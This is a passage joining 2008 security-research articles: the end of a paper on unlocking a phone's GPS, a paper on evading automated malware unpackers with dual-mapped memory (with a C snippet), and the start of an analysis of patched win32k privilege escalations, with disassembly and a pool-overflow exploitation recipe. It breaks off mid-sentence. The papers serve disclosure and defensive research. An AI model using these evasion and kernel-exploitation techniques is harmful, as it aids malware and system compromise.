outside the normal image confines serves on Windows Mobile for non-XIP modules
that are loaded into device RAM.
Furthermore, the HMODULE of an image does not equate to its load base address
on Windows Mobile. One can retrieve the real load base address of a module on
Windows Mobile via the GetModuleInformation API. This is a significant
departure from standard Windows.
Due to these limitations, the author elected not to pursue IAT hooking for the
purposes of the GPS unlocking project. Although there is code publicly
available to cope with the relocation of an image's IAT, it appears to be
dependent on kernel data structures that the author did not have a conveniently
available and accurate definition for these structures corresponding to the
Windows Mobile kernel shipping on the xv6800.
7. Conclusion
Locking down the gpsOne hardware on the xv6800 such that it can only be
utilized by Verizon Wireless certified and approved applications can be seen in
two lights. One could consider such actions an anti-competitive move, designed
to lock out third party programs from having the opportunity to compete with
VZ Navigator. However, such a reasoning is fairly questionable, given that
other carriers in the United States (particularly GSM-based carriers) typically
fully support third party GPS-enabled applications on their devices. As
consumers expect more full-featured and advanced devices, locking down devices
to only carrier-approved functionality is becoming an increasingly large
competitive liability for companies seeking to differentiate their networks
and devices in today's saturated mobile phone markets.
Furthermore, Verizon Wireless's currently shipping location-enabled application
for the xv6800, VZ Navigator, remains competitive (by virtue of features such
as turn-by-turn voice navigation, traffic awareness, and automatic re-routing)
even if the built-in GPS hardware on the xv6800 were to be unlocked for
general-purpose use. Freely available navigation programs lack these features,
and commercial applications are based off of a different pricing model than the
periodic monthly fee model used by VZ Navigator at the time of this article's
writing.
A more reasonable (although perhaps misguided) rationale for locking down the
gpsOne hardware is to protect users from having their location harvested or
tracked by malicious programs. Unfortunately, the relatively open nature of
Windows Mobile 6, and a lack of particularly effective privilege-level
isolation on Windows Mobile 6 after any unsigned code is permitted to run both
conspire to greatly diminish the effectiveness of the protection schemes that
are implemented on the xv6800.
Whether this is a legitimate concern or not remains, of course, up for debate,
but it is clear that the lockdown system as present on the xv6800 is not
particularly effective against blocking access to un-approved third party
applications.
Future releases of Windows Mobile claim support for a much more effective
privilege isolation model that may provide true security from unprivileged,
malicious programs. However, in currently shipping devices, the operating
system cannot be relied upon to provide this protection. Relying on security
through obscurity to implement lockdown and protection schemes may then seem
attractive, but such mechanisms rarely provide true security.
As mobile phone advance to becoming more and more powerful devices, in effect
becoming small general-purpose computers, privacy and security concerns begin
to gain greater relevance. With the capability to record a user's location
and audio and environment (via built-in microphones and cameras present on
virtually all modern-day phones), there arises the chance for a serious privacy
breeches, especially given modern day smartphones have historically not seen
the more vigorous level of security review that is slowly becoming more common-
place on general purpose computers.
One simple and elegant potential solution to these privacy risks is to simply
provide hardware switches to disable sensitive components, such as cameras or
embedded GPS hardware. Keeping in mind with this philosophy, the author would
encourage Verizon Wireless to fully open up their devices, and defer to simple
and secure methods to allow users to manage their sensitive information, such
as physical hardware switches.
Bibliography:
[1] Verizon Wireless. Commercial Location Based Services.
http://www.vzwdevelopers.com/aims/public/menu/lbs/LBSLanding.jsp; accessed October 10, 2008
[2] Verizon Wireless. LBS Application Questions ("What can I do to ensure that my application is accepted, and to ensure a smooth certification process?").
http://www.vzwdevelopers.com/aims/public/menu/lbs/LBSFAQ.jsp#LBSAppQues7; accessed October 10, 2008
[3] Daniel Álvarez. Debugging Windows Mobile 6 Applications with IDA.
http://dani.foroselectronica.es/debugging-windows-mobile-6-applications-with-ida-69/; accessed October 10, 2008
[4] Microsoft. GPS Intermediate Driver Reference.
http://msdn.microsoft.com/en-us/library/ms850332.aspx; accessed October 10, 2008
[5] Microsoft. GPSOpenDevice.
http://msdn.microsoft.com/en-us/library/bb202113.aspx; accessed October 10, 2008
[6] Microsoft. GPSGetPosition.
http://msdn.microsoft.com/en-us/library/bb202050.aspx; accessed October 10, 2008
[7] Verizon Wireless. LBS Application Questions ("Can the user change their privacy settings?").
http://www.vzwdevelopers.com/aims/public/menu/lbs/LBSFAQ.jsp#GenQues16; accessed October 10, 2008
[8] Microsoft. GetModuleFileName Function (Windows).
http://msdn.microsoft.com/en-us/library/ms683197(VS.85).aspx; accessed October 10, 2008
[9] Microsoft. CryptImportKey Function (Windows).
http://msdn.microsoft.com/en-us/library/aa380207(VS.85).aspx; accessed October 11, 2008
[10] Microsoft. Example C program: Imprtoing a Plaintext Key (Windows).
http://msdn.microsoft.com/en-us/library/aa382383(VS.85).aspx; accessed October 11, 2008

231
uninformed/10.2.txt Normal file
View File

@ -0,0 +1,231 @@
Using dual-mappings to evade automated unpackers
10/2008
skape
mmiller@hick.org
Abstract: Automated unpackers such as Renovo, Saffron, and Pandora's Bochs
attempt to dynamically unpack executables by detecting the execution of code
from regions of virtual memory that have been written to. While this is an
elegant method of detecting dynamic code execution, it is possible to evade
these unpackers by dual-mapping physical pages to two distinct virtual address
regions where one region is used as an editable mapping and the second region
is used as an executable mapping. In this way, the editable mapping is
written to during the unpacking process and the executable mapping is used to
execute the unpacked code dynamically. This effectively evades automated
unpackers which rely on detecting the execution of code from virtual addresses
that have been written to.
Update: After publishing this article it was pointed out that the design of
the Justin dynamic unpacking system should invalidate evasion techniques that
assume that the unpacking system will only trap on the first execution attempt
of a page that has been written to. Justin counters this evasion technique
implicitly by enforcing W ^ X such that when a page is executed from for the
first time, it is marked as executable but non-writable. Subsequent write
attempts will cause the page be marked as non-executable and dirty. This
logic is enforced across all virtual addresses that are mapped to the same
physical pages. This has the potential to be an effective countermeasure,
although there are a number of implementation complexities that may make it
difficult to realize in a robust fashion, such as those related to the
duplication of handles and the potential for race conditions when
transitioning page protections.
1. Background
There are a number of automated unpackers that rely on detecting the execution
of dynamic code from virtual addresses that has been written to. This section
provides some background on the approaches taken by these unpackers.
1.1 Malware Normalization
Christodorescu et al. described a method of normalizing programs which focuses
on eliminating obfuscation[2]. One of the components of this normalization
process consists of an iterative algorithm that is meant to produce a program
that is not self-generating. In essence, this algorithm relies on detecting
dynamic code execution to identify self-generated code. To support this
algorithm, QEMU was used to monitor the execution flow of the input program as
well as all memory writes that occur. If execution is transferred to an
address that has been written to, it is known that dynamic code is being
executed.
1.2 Renovo
Renovo is similar to the malware normalization technique in that it uses an
emulated environment to monitor program execution and memory writes to detect
when dynamic code is executed[3]. Renovo makes use of TEMU as the execution
environment for a given program. When Renovo detects the execution of code
from memory that was written to in the context of a given process, it extracts
the dynamic code and attempts to find the original entry point of the unpacked
executable.
1.3 Saffron
Saffron uses two approaches to dynamically unpack executables[5]. The first
approach involves using Pin's dynamic instrumentation facilities to monitor
program execution and memory writes in a direction similar to the emulated
approaches described previously. The second approach makes use of hardware
paging features to detect when execution is transferred to a memory region.
Saffron detects the first time code is executed from a page, regardless of
whether or not it is writable, and logs information about the execution to
support extracting the unpacked executable. This can be seen as a more
generic version of the technique used by OllyBonE which focused on using
paging features to monitor a specific subset of the address space[8].
OmniUnpack also uses an approach that is similar to Saffron[4].
1.4 Pandora's Bochs
Pandora's Bochs uses techniques similar to those used by Christodorescu and
Renovo[1]. Specifically, Pandora's Bochs uses Bochs as an emulation environment
in which to monitor program execution and memory writes to detect when dynamic
code is executed.
1.5 Justin
Justin is a recently developed dynamic unpacking system that was presented at
RAID 2008 after the completion of the initial draft of this paper[9]. Justin
differs from previous work in that is uses hardware non-executable paging
support to enforce W ^ X on virtual address regions. When an execution
attempt occurs, an exception is generated and Justin determines whether or not
the page being executed from was written to previously. The authors of Justin
correctly identified the evasion technique described in the following section
and have attempted to design their system to counter it. Their approach
involves verifying that the protection attributes are the same across all
virtual addresses that map to the same physical pages. This should be an
effective countermeasure, although there is certainly room for attacking
implementation weaknesses, should any exist.
2. Dual-mapping
The automated unpackers described previously rely on their ability to detect
the execution of dynamic code from virtual addresses that have been written
to. This implicitly assumes that the virtual address used to execute code
will be equal to an address that was written to previously. While this
assumption is safe in most circumstances, it is possible to use features
provided by the Windows memory manager to evade this form of detection.
The basic idea behind this evasion technique involves dual-mapping a set of
physical pages to two virtual address regions. The first region is considered
an editable mapping and the second region is considered an executable mapping.
The contents of the unpacked executable are written to the editable mapping
and later executed using the executable mapping. Since both mappings are
associated with the same physical pages, the act of writing to the editable
mapping indirectly alters the contents of the executable mapping. This evades
detection by making it appear that the code that is executed from the
executable mapping was never actually written to. This technique is
preferable to writing the unpacked executable to disk and then mapping it into
memory as doing so would enable trivial unpacking and detection.
Implementing this evasion technique on Windows can be accomplished using fully
supported user-mode APIs. First, a pagefile-backed section (anonymous memory
mapping) must be created using the CreateFileMapping API. The handle returned
from this function must then be passed to MapViewOfFile to create both the
editable and executable mappings. Finally, the dynamic code must be unpacked
into the editable mapping through whatever means and then executed using the
executable mapping. This is illustrated in the code below:
ImageMapping = CreateFileMapping(
INVALID_HANDLE_VALUE, NULL,
PAGE_EXECUTE_READWRITE | SEC_COMMIT,
0, CodeLength, NULL);
EditableBaseAddress = MapViewOfFile(ImageMapping,
FILE_MAP_READ | FILE_MAP_WRITE,
0, 0, 0);
ExecutableBaseAddress = MapViewOfFile(ImageMapping,
FILE_MAP_EXECUTE | FILE_MAP_READ | FILE_MAP_WRITE,
0, 0, 0);
CopyMemory(EditableBaseAddress,
CodeBuffer, CodeLength);
((VOID (*)())ExecutableBaseAddress)();
The example code provides an illustration of using this technique to execute
dynamic code. This technique should also be fairly easy to adapt to the
unpacking code used by existing packers. One consideration that must be made
when using this technique is that relocations must be applied to the unpacked
executable relative to the base address of the executable mapping. With that
said, the relocation fixups themselves must be applied to the editable mapping
in order to avoid tainting the executable mapping.
An additional evasion technique may also be necessary for certain dynamic
unpackers that monitor code execution from any virtual address, regardless of
whether or not it was previously written to. This is the case with Saffron's
paging-based automated unpacker[5]. For performance reasons, Saffron only logs
information the first time code is executed from a page. If the contents of
the code changes after this point, Saffron will not be aware of them. This
makes it possible to evade this form of unpacking by executing innocuous code
from each page of the executable mapping. Once this has finished, the actual
unpacked executable can be extracted into the editable mapping and then
executed normally. This evasion technique should also be effective against
Justin due to the fact that Justin does not trap on subsequent execution
attempts from a given virtual address[9].
While these evasion techniques are expected to be effective, they have not
been experimentally verified. There are a number of reasons for this. No
public version of Pandora's Bochs is currently available. However, its author
has indicated that this technique should be effective. Renovo provides a web
interface that can be used to analyze and unpack executables. No data was
received after uploading an executable that simulated this evasion technique.
The authors of Saffron have indicated that they expected this technique to be
effective.
3. Weaknesses
Perhaps the most significant weakness of the dual-mapping technique is that it
is not capable of evading all automated unpackers. For example, dynamic
unpacking techniques that strictly focus on control flow transfers, such as
PolyUnpack[7] and ParaDyn[6], should still be effective. However, this
weakness could be overcome by incorporating additional evasion techniques,
such as those mentioned in cited work[7].
Automated unpackers could also attempt to invalidate the dual-mapping
technique by monitoring writes and code execution in terms of physical
addresses rather than virtual addresses. This would be effective due to the
the fact that both the editable and executable virtual mappings would refer to
the same physical addresses. However, this approach would likely require a
better understanding of operating system semantics since memory may be paged
in and out at any time.
4. Conclusion
The dual-mapping technique can be used by packers to evade automated unpacking
tools that rely on detecting dynamic code execution from virtual addresses
that have been written to. While this evasion technique is expected to be
effective in its current form, it should be possible for automated unpackers
to adapt to handle this scenario such as by monitoring writes to physical
pages or by better understanding operating system semantics that deal with
virtual memory mappings.
References
[1] L. Boehne. Pandora's bochs: Automatic unpacking of malware.
http://www.0x0badc0.de/PandorasBochs.pdf, Jan 2008.
[2] Mihai Christodorescu, Johannes Kinder, Somesh Jha, Stefan Katzenbeisser,
and Helmut Veith. Malware normalization. Technical Report 1539, University
of Wisconsin and Madison, Wisconsin, USA, November 2005.
[3] M. Gyung Kang, P. Poosankam, and H. Yin. Renovo: A hidden code extractor
for packed executables.
http://www.andrew.cmu.edu/user/ppoosank/papers/renovo.pdf, Oct 2007.
[4] L. Martignoni, M. Christodorescu, and S. Jha. Omniunpack: Fast and generic
and and safe unpacking of malware.
http://www.acsac.org/2007/papers/151.pdf, December 2007.
[5] Danny Quist and Valsmith. Covert debugging: Circumventing software
armoring techniques. BlackHat USA, Aug 2007.
[6] K. Roundy. Analysis and instrumentation of packed binary code.
http://www.cs.wisc.edu/condor/PCW2008/paradyn_presentations/roundy-packedCode.ppt,
Apr 2008.
[7] P. Royal, M. Haplin, D. Dagon, R. Edmonds, and W. Lee. Polyunpack:
Automating the hidden-code extraction of unpack-executing malware. 22nd
Annual Computer Security Applications Conference, Dec 2005.
[8] J. Stewart. Ollybone. 2006.
[9] Fanglu Guo, Peter Ferrie, and Tzi cker Chiueh. A study
of the packer problem and its solutions. In RAID, pages
98.115, 2008.

867
uninformed/10.3.txt Normal file
View File

@ -0,0 +1,867 @@
Analyzing local privilege escalations in win32k
10/2008
mxatone
mxatone@gmail.com
Abstract: This paper analyzes three vulnerabilities that were found in
win32k.sys that allow kernel-mode code execution. The win32k.sys driver is a
major component of the GUI subsystem in the Windows operating system. These
vulnerabilities have been reported by the author and patched in MS08-025[1]. The
first vulnerability is a kernel pool overflow with an old communication
mechanism called the Dynamic Data Exchange (DDE) protocol. The second
vulnerability involves improper use of the ProbeForWrite function within
string management functions. The third vulnerability concerns how win32k
handles system menu functions. Their discovery and exploitation are covered.
1) Introduction
The design of modern operating systems provides a separation of privileges
between processes. This design restricts a non-privileged user from directly
affecting processes they do not have access to. This enforcement relies on
both hardware and software features. The hardware features protect devices
against unknown operations. A secure environment provides only necessary
rights by filtering program interaction within the overall system. This
control increases provided interfaces and then security risks. Abusing
operating system design or implementation flaws in order to elevate a
program's rights is called a privilege escalation.
During the past few years, userland code and protection had been ameliorated.
The amelioration of operating system understanding has made abnormal behaviour
detection easier. The exploitation of classical weakness is harder than it
was. Nowadays, local exploitation directly targets the kernel. Kernel local
privilege escalation brings up new exploitation methods and most of them are
certainly still undiscovered. Even if the Windows kernel is highly protected
against known attack vectors, the operating system itself has a lot of
different drivers that contribute to its overall attack surface.
On Windows, the graphical user interface (GUI) is divided into both
kernel-mode and user-mode components. The win32k.sys driver handles user-mode
requests for graphic rendering and window management. It also redirects
DirectX calls on to the appropriate driver. For local privilege escalation,
win32k represents an interesting target as it exists on all versions of
Windows and some features have existed for years without modifications.
This article presents the author's work on analyzing the win32k driver to find
and report vulnerabilities that were addressed in Microsoft bulletin
MS08-025[1]. Even if the patch adds an overall protection layer, it concerns
three reported vulnerabilities on different parts of the driver. The Windows
graphics stack is very complex and this article will focus on describing some
of win32k's organization and functionalities. Any reader who is interested in
this topic is encouraged to look at MSDN documentation for additional
information.
The structure of this paper is as follows. In chapter , the win32k driver
architecture basics will be presented with a focus on vulnerable contexts.
Chapter will detail how each of the three vulnerabilities was discovered and
exploited. Finally, chapter will discuss possible security improvements for
the vulnerable driver.
2) Win32k design
Windows is based on a graphical user interface and cannot work without it. Only
Windows Serer 2008 in server core mode uses a minimalist user interface but
share the exact same components that typical user interfaces. The win32k driver
is a critical component in the graphics stack exporting more than 600 functions.
It extends the System Service Descriptor Table (SSDT) with another
table called (W32pServiceTable). This driver is not as big as the
main kernel module (ntoskrnl.exe) but its interaction with the
user-mode is just as important. The service table for win32k contains less than
300 functions depending on the version of Windows. The win32k driver commonly
transfers control to user-mode with a user-mode callback system that will be
explained in this part. The interface between user-mode modules and
kernel-mode drivers has been built in order to facilitate window creation and
management. This is a critical feature of Windows which may explain why
exactly the same functions can be seen across multiple operating system
versions.
2.1) General security implementation
The most important part of a driver in terms of security is how it validates
user-mode inputs. Each argument passed as a pointer must be a valid user-mode
address and be unchangeable to avoid race conditions. This validation is often
accomplished by comparing a provided address with an address near the base of
kernel memory using functions such as ProbeForRead and ProbeForWrite. Input
contained within pointers is also typically cached in local variables
(capturing). The Windows kernel design is very strict on this part. When you
look deeper into win32k's functions, you will see that they do not follow the
same strict integrity verifications made by the kernel. For example, consider
the following check made by the Windows kernel (translated to C):
NTSTATUS NTAPI NtQueryInformationPort(
HANDLE PortHandle,
PORT_INFORMATION_CLASS PortInformationClass,
PVOID PortInformation,
ULONG PortInformationLength,
PULONG ReturnLength
)
[...] // Prepare local variables
if (AccesMode != KernelMode)
{
try {
// Check submitted address - if incorrect, raise an exception
ProbeForWrite( PortInformation, PortInformationLength, 4);
if (ReturnLength != NULL)
{
if (ReturnLength > MmUserProbeAddress)
*MmUserProbeAddress = 0; // raise exception
*ReturnLength = 0;
}
} except(1) { // Catch exceptions
return exception_code;
}
}
[...] // Perform actions
We can see that the arguments are tested in a very simple way before doing
anything else. The ReturnLength field implements its own verification which
relies directly on MmUserProbeAddress. This variable marks the separation
between user-mode and kernel-mode address spaces. In case of an invalid
address, an exception is raised by writting in this variable which is
read-only. The ProbeForRead and ProbeForWrite functions verifications routines
raised an exception if an incorrect address is encounter. However, the win32k
driver does not allows follow this pattern:
BOOL NtUserSystemParametersInfo(
UINT uiAction,
UINT uiParam,
PVOID pvParam,
UINT fWinIni)
[...] // Prepare local variables
switch(uiAction)
{
case SPI_1:
// Custom checks
break;
case SPI_2:
size = sizeof(Stuct2);
goto prob_read;
case SPI_3:
size = sizeof(Stuct3);
goto prob_read;
case SPI_4:
size = sizeof(Stuct4);
goto prob_read;
case SPI_5:
size = sizeof(Stuct5);
goto prob_read;
case SPI_6:
size = sizeof(Struct6);
prob_read:
ProbeForRead(pvParam, size, 4)
[...]
}
[...] // Perform actions
This function is very complex and this example presents only a small part of
the checks. Some parameters need only classic verification while others
implement their own. This elaborate code can create confusion which improves
the chances of a local privilege escalation. The issues comes from unordinary
kernel function that handles multiple features at the same time without
implementing a standardized function prototype. The Windows kernel solved this
issue on NtSet* and NtQuery* functions by using two simple arguments. The
first argument is a classical buffer and the second argument is its size. For
example, the NtQueryInformationPort function will check the buffer in a
generic way and then only verify that the size correspond to the specified
feature. The win32k design implementation ameliorates GUI development but make
code review very difficult.
2.2) KeUsermodeCallback utilization
Typical interaction between user-mode and kernel-mode is done via syscalls. A
user-mode module may request that the kernel execute an action and return
needed information. The win32k driver has a callback system to do the exact
opposite. The KeUsermodeCallback function calls a user-mode function from
kernel-mode. This function is undocumented and provided by the kernel module
in a secure way in order to switch into user-mode properly. The win32k driver
uses this functionality for common task such as loading a dll module for event
catching or retrieving information. The prototype of this function:
NTSTATUS KeUserModeCallback (
IN ULONG ApiNumber,
IN PVOID InputBuffer,
IN ULONG InputLength,
OUT PVOID *OutputBuffer,
IN PULONG OutputLength
);
Microsoft did not make a system to retrieve arbitrary user-mode function
addresses from the kernel. Instead, the win32k driver has a set of functions
that it needs to call. This list is kept in an undocumented function table in
the Process Environment Block (PEB) structure for each process. The ApiNumber
argument refers to an index into this table.
In order to return on user-mode, KeUserModeCallback retrieves the user-mode
stack address from saved user-mode context stored in a thread's KTRAP_FRAME
structure. It saves current stack level and uses ProbeForWrite to check if
there is enough room for the input buffer. The Inputbuffer argument is then
copied into the user stack and an argument list is created for the function
being called. The KiCallUserMode function prepares the return in user-mode by
saving important information in the kernel stack. This callback system works
as a normal syscall exit procedure except than stack level and eip register
has been changed. The callback start in the KiUserCallbackDispatcher function.
VOID KiUserCallbackDispatcher(
IN ULONG ApiNumber,
IN PVOID InputBuffer,
IN ULONG InputLength
);
The user-mode function KiUserCallbackDispatcher receives an argument list
which contains ApiNumber, InputBuffer, and InputLength. It does appropriate
function dispatching using the PEB dispatch table. When it is finished the
routine invokes interrupt 0x2b to transfer control back to kernel-mode. In
turn, the kernel inspects three registers:
- ecx: contains a user-mode pointer for OutputBuffer
- edx: is for OutputLength
- eax: contains return status.
The KiCallbackReturn kernel-mode function handles the 0x2B interrupt and
passes important registers as argument for the NtCallbackReturn function.
Everything is cleaned using saved information within the kernel stack and it
transfers to previously called KeUsermodeCallback function with proper output
argument sets.
The reader should notice that nothing is done to check ouput data. Each kernel
function that uses the user-mode callback system is responsible for verifying
output data. An attacker can simply hook the KiUserCallbackDispatcher
function and filter requests to control output pointer, size and data. This
user-mode call can represent an important issue if it was not verified as
seriously as system call functions.
3) Discovery and exploitation
The win32k driver was patched by the MS08-025 bulletin[1]. This bulletin did
not disclose any details about the issues but it did talk about a
vulnerability which allows privilege elevation though invalid kernel checks.
This patch increases the overall driver security by adding multiple
verifications. In fact, this patch was due to three different reported
vulnerabilities. The following sections explain how these vulnerabilities were
discovered and exploited.
3.1) DDE Kernel pool overflow
The Dynamic Data Exchange (DDE) protocol is a GUI integrated message system .
Despite Windows operating system has already many different message
mechanisms, this one share data across process by sharing GUI handles and
memory section. This feature is quite old but still supported by Microsoft
application as Internet explorer and used in application firewalls bypass
technique. During author's research on win32k driver, he investigated how the
KeUsermodeCallback function was used. As described previously, this function
does not verify directly output data. This lack of validation is what leads
to this vulnerability.
3.1.1) Vulnerability details
The vulnerability exists in the xxxClientCopyDDEIn1 win32k function. It is
not called directly but it is used internally in the kernel when messages are
exchanged between processes using the DDE protocol. In this context, the
OutputBuffer verification is analyzed.
In xxxClientCopyDDEIn1 function:
lea eax, [ebp+OutputLength]
push eax
lea eax, [ebp+OutputBuffer]
push eax
push 8 ; InputLength
lea eax, [ebp+InputBuffer]
push eax
push 32h ; ApiNumber
call ds:__imp__KeUserModeCallback@20
mov esi, eax ; return < 0 (error ?)
call _EnterCrit@0
cmp esi, edi
jl loc_BF92C6D4
cmp [ebp+OutputLength], 0Ch ; Check output length
jnz loc_BF92C6D4
mov [ebp+ms_exc.disabled], edi ; = 0
mov edx, [ebp+OutputBuffer]
mov eax, _Win32UserProbeAddress
cmp edx, eax ; Check OutputBuffer address
jb short loc_BF92C5DC
[...]
loc_BF92C5DC:
mov ecx, [edx]
loc_BF92C5DE:
mov [ebp+var_func_return_value], ecx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
push 2
pop esi
cmp ecx, esi ; first OutputBuffer ULONG must be 2
jnz loc_BF92C6D4
xor ebx, ebx
inc ebx
mov [ebp+ms_exc.disabled], ebx ; = 1
mov [ebp+ms_exc.disabled], esi ; = 2
mov ecx, [edx+8] ; OutputBuffer - user mode ptr
cmp ecx, eax ; Win32UserProbeAddress - check user mode ptr
jnb short loc_BF92C602
[...]
loc_BF92C602:
push 9
pop ecx
mov esi, eax
lea edi, [ebp+copy_output_data]
rep movsd
mov [ebp+ms_exc.disabled], ebx ; = 1
push 0
push 'EdsU'
mov ebx, [ebp+copy_output_data.copy1_size] ; we control this
mov eax, [ebp+copy_output_data.copy2_size] ; and this
lea eax, [eax+ebx+24h] ; integer overflow right here
push eax ; NumberOfBytes
call _HeavyAllocPool@12
mov [ebp+allocated_buffer], eax
test eax, eax
jz loc_BF92C6B6
mov ecx, [ebp+var_2C]
mov [ecx], eax ; save allocation addr
push 9
pop ecx
lea esi, [ebp+copy_output_data]
mov edi, eax
rep movsd ; Copy output data
test ebx, ebx
jz short loc_BF92C65A
mov ecx, ebx
mov esi, [ebp+copy_output_data.copy1_ptr]
lea edi, [eax+24h]
mov edx, ecx
shr ecx, 2
rep movsd ; copy copy1_ptr (with copy1_size)
mov ecx, edx
and ecx, 3
rep movsb
loc_BF92C65A:
mov ecx, [ebp+copy_output_data.copy2_size]
test ecx, ecx
jz short loc_BF92C676
mov esi, [ebp+copy_output_data.copy2_ptr]
lea edi, [ebx+eax+24h]
mov edx, ecx
shr ecx, 2
rep movsd movsd ; copy copy2_ptr (with copy2_size)
mov ecx, edx
and ecx, 3
rep movsb
The DDE copydata buffer contains two different buffers with their respective
sizes. These sizes are used to calculate the size of a buffer that is
allocated. However, appropriate checks are not made to detect if an integer
overflow occurs. An integer overflow exists when an arithmetic operation is
done between different integers that would go behind maximum integer value and
then create a lower integer. As such, the allocated buffer may be smaller than
each buffer size which leads to a kernel pool overflow. The pool is the name
used to designated the Windows kernel heap.
3.1.2) Pool overflow exploitation
The key to exploiting this issue is more about how to exploit a kernel pool
overflow. Previous work has described the kernel pool system and
exploitation[8,9]. This paper will focus on the exploiting the vulnerability
being described.
The kernel pool can be thought of as a heap. Memory is allocated by the
ExAllocatePoolWithTag function and then freed using the ExFreePoolWithTag
function. Depending of memory size, a header chunk precedes memory data.
Exploiting a pool overflow involves replacing the next chunk header with a
crafted version. This header is available though ntoskrnl module symbols as:
typedef struct _POOL_HEADER
{
union
{
struct
{
USHORT PreviousSize : 9;
USHORT PoolIndex : 7;
USHORT BlockSize : 9;
USHORT PoolType : 7;
}
ULONG32 Ulong1;
}
union
{
struct _EPROCESS* ProcessBilled;
ULONG PoolTag;
struct
{
USHORT AllocatorBackTraceIndex;
USHORT PoolTagHash;
}
}
} POOL_HEADER, *POOL_HEADER; // sizeof(POOL_HEADER) == 8
Size fields are a multiple of 8 bytes as an allocated block will always be 8
byte aligned. Windows 2000 pool architecture is different. Memory blocks are
aligned on 16 bytes and flags type is a simple UCHAR (no bitfields). The
PoolIndex field is not important for our overflow and can be set to 0. The
PoolType field contains chunk state with multiple possible flags. The busy
flag changes between operating system version but free chunk always got the
PoolType field to zero.
During a pool overflow, the next chunk header is overwritten with malicious
values. When the allocated block is freed, the ExFreePoolWithTag function will
look at the next block type. If the next block is free it is coalesced by
unlinking and merging it with current block. The LIST_ENTRY structure links
blocks together and is adjacent to the POOL_HEADER structure if current chunk
is free. The unlinking procedure is exactly the same as the behavior of the
user-mode heap except that no safe unlinking check is done. This procedure is
repeated for previous block. Many papers already explained unlinking
exploitation which allows writing 4 bytes to a controlled address. However,
this attack breaks a pool's internal linked list and exploitation must take
this into consideration. As such, it is necessary to restore the pool's list
integrity to prevent the system from crashing.
There are a number of different addresses that may be overwritten such as
directly modifying code or overwriting the contents of a function pointer. In
local kernel exploitation, the target address should be uncommonly unused by
the kernel to prevent operating system instability. In his paper, Ruben
Santamarta used a function pointer accessible though an exported kernel
variable named HalDispatchTable[10]. This function pointer is used by
KeQueryIntervalProfile which is called by the system call
NtQueryIntervalProfile. Overwriting the function pointer at HalDispatchTable+4
does not break system behavior as this function is unsupported. A clean
privilege escalation code should consider restoring overwritten data. in
default configuration. For our exploitation, this is the best choice as it is
easy to launch and target.
The exploitation code for this this particular vulnerability should produce
this fake chunk:
Fake next pool chunk header for Windows XP / 2003:
PreviousSize = (copy1_size + sizeof(POOL_HEADER)) / 8
PoolIndex = 0
BlockSize = (sizeof(POOL_HEADER) + 8) / 8
PoolType = 0 // Free chunk
Flink = Execute address - 4 // in userland - call +4 address
Blink = HalDispatchTable + 4 // in kernelland
Modification for Windows 2000 support:
PreviousSize = (copy1_size + sizeof(POOL_HEADER)) / 16
BlockSize = (sizeof(POOL_HEADER) + 15) / 16
The Flink field points on a user-mode address less 4 that will be called from
the kernel address space once the Blink function pointer would be replaced.
When called by the kernel, the user-mode address will execute at ring0 and is
able to modify operating system behavior.
In this specific vulnerability, to avoid a crash and control copied data in
target memory buffer, copy2ptr should point to a NOACCESS memory page. When
the copy occurs, an exception will be raised which will be caught by a
try/except block in the function. For this exception, the allocated buffers
are freed. Copied memory size would be controlled by copy1size field and
integer overflow will be done by copy2size field. This configuration allows to
overflow only the necessary part.
3.1.3) Delayed free pool overflow on Windows Vista
The allocation pool type in win32k on Windows Vista uses an undocumented
DELAY_FREE flag. With this flag, the ExFreePoolWithTag function does not
liberate a memory block but instead pushes it into a deferred free list. If
the kernel needs more memory or the deferred free list is full it will pop an
entry off the list and liberate it through normal means. This can cause
problems because the actual free may not occur until many minutes later in a
potentially different process context. Due to this problem, both Flink and
Blink pointers must be in the kernel mode address space.
The HalDispatchTable overwrite technique can be reused to support this
configuration. The KeQueryIntervalProfile function disassembly shows how the
function pointer is used. This context is always the same across Windows
versions.
mov [ebp+var_C], eax
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_C]
push eax
push 0Ch
push 1
call off_47503C ; xHalQuerySystemInformation(x,x,x,x)
The first and the second arguments points into user-mode in the NULL page.
This page can be allocated using the NtAllocateVirtualMemory function with an
unaligned address in NULL page. The kernel function will realign this pointer
on lower page and allocate this page. This page is also used in kernel NULL
dereference vulnerabilities. In order to exploit this context, a stub of
machine code must be found which returns on first argument and where next 4
bytes can be overwritten. This is the case of function epilogues as for wcslen
function:
.text:00463B4C sub eax, [ebp+arg_0]
.text:00463B4F sar eax, 1
.text:00463B51 dec eax
.text:00463B52 pop ebp
.text:00463B53 retn
.text:00463B54 db 0CCh ; alignement padding
.text:00463B55 db 0CCh
.text:00463B56 db 0CCh
.text:00463B57 db 0CCh
.text:00463B58 db 0CCh
In this example, the 00463B51h address fits our needs. The pop instruction
pass the return address and the retn instruction return in 1. The alert
reader noticed that the selected address start at dec instruction. The
unlinking procedure unlinks the next 4 bytes and the 00463B54h address has 5
padding bytes. Without this padding, overwriting unknown assembly could lead
to a crash compromising the exploitation. The location of this target address
changes depending on operating system version but this type of context can be
found using pattern matching. On Windows Vista, the vulnerability exploitation
loops calling the NtQueryIntervalProfile function until deferred free occurs
and exploitation is successful. This loop is mandatory as pool internal
structure must be corrected.
3.2) NtUserfnOUTSTRING kernel overwrite vulnerability
The NtUserfnOUTSTRING function is accessible through an internal table used by
NtUserMessageCall exported function. Functions starting by "NtUserfn" can be
called with SendMessage function exported by user32.dll module. For this
function the WM_GETTEXT window message is necessary. Notice that in some cases
a direct call is needed for successful exploitation. Verifications made by
SendMessage function are trivial as it is used for different functions but
should be considered. The MSDN website describes SendMessage utilization .
3.2.1) Evading ProbeForWrite function
The ProbeForWrite function verifies that an address range resides in the
user-mode address space and is writable. If not, it will raise an exception
that can be caught by a try / except code block. This function is used by a
lot by drivers which deal with user-mode inputs. THe following is the start of
the ProbeForWrite function assembly:
void __stdcall ProbeForWrite(PVOID Address, SIZE_T Length, ULONG Alignment)
mov edi, edi
push ebp
mov ebp, esp
mov eax, [ebp+Length]
test eax, eax
jz short loc_exit ; Length == 0
[...]
loc_exit:
pop ebp
retn 0Ch
This short assembly dump underlines one way to evade ProbeForWrite function.
If Length argument is zero, no verification is done on Address argument. It
means that Microsoft considers that a zero length input do not require address
to point in userland. Microsoft made a blog post on MS08-025[12] and why
ProbeForWrite was not modified as expected. Microsoft compatibility concern is
understandable but at least ProbeForWrite documentation should be updated for
this case.
3.2.2) Vulnerability details
This vulnerability touches not only this function but a whole class of string
management functions. Some functions make sure that length argument is not
